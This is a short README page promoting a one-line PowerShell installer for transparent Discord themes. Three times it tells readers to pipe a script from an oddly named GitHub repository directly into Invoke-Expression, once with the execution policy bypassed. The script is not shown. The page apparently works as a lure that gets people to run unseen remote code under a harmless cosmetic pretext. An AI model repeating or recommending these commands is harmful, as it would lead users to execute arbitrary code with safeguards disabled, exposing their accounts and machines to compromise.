One-liner to install transparent acrylic themes for Discord — supports Vencord, BetterDiscord, and Vesktop.
Open PowerShell and run:
irm https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | iexThat's it. The installer handles everything.
- Detects which Discord client is installed (Stable, PTB, Canary, Vesktop).
- Downloads the Acrylic Harmony CSS bundle and
Mica for Everyoneintegration. - Injects the theme into Vencord/BetterDiscord's theme directory automatically.
- Enables transparency flags in the Discord desktop config.
- Windows 10 / 11 (for acrylic/mica effects)
- Discord Desktop (any variant)
- Vencord or BetterDiscord installed
- PowerShell 5.1+
Theme loads but no transparency
Enable Window Transparency in Vencord settings, or install Mica for Everyone.
BetterDiscord: theme not showing in list
The CSS was placed in the wrong folder. Re-run with --bd flag.
Discord crashes after applying
You have a conflicting theme — place Acrylic Harmony last in the load order.
Alternative (bypass execution policy):
powershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | iex""irm is not recognized" — old PowerShell. Use:
Invoke-RestMethod https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | Invoke-ExpressionMIT — see LICENSE.